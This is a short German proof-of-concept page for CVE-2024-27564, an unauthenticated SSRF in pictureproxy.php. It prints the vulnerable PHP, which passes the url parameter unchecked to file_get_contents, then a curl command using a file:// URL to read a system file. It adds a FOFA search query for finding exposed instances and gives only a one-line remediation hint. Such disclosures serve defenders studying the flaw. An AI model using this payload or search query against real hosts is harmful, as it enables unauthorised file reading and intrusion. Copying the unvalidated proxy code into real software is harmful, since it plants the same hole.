
Proof-of-Concept für CVE-2024-27564, eine nicht authentifizierte SSRF in pictureproxy.php über den url-Parameter, mit verwundbarem Code, curl-PoC und Hinweisen zur Behebung.
Eine Schwachstelle in pictureproxy.php ermöglicht es entfernten Angreifern, beliebige Anfragen durchzuführen, indem sie URLs in den url-Parameter injizieren. Diese SSRF-Schwachstelle kann ohne Authentifizierung ausgenutzt werden, was sie besonders gefährlich macht.
Der verwundbare Code befindet sich in der Datei pictureproxy.php. Das Problem tritt auf, weil die Funktion den Parameter url nicht ordnungsgemäß validiert. Die Variable $_GET['url'] wird an die Funktion file_get_contents() übergeben, die Inhalte von der angegebenen URL abruft. Dies kann zu SSRF führen.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl-Anfrage:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Ein ordnungsgemäßes Management der Eingabevalidierung ist erforderlich.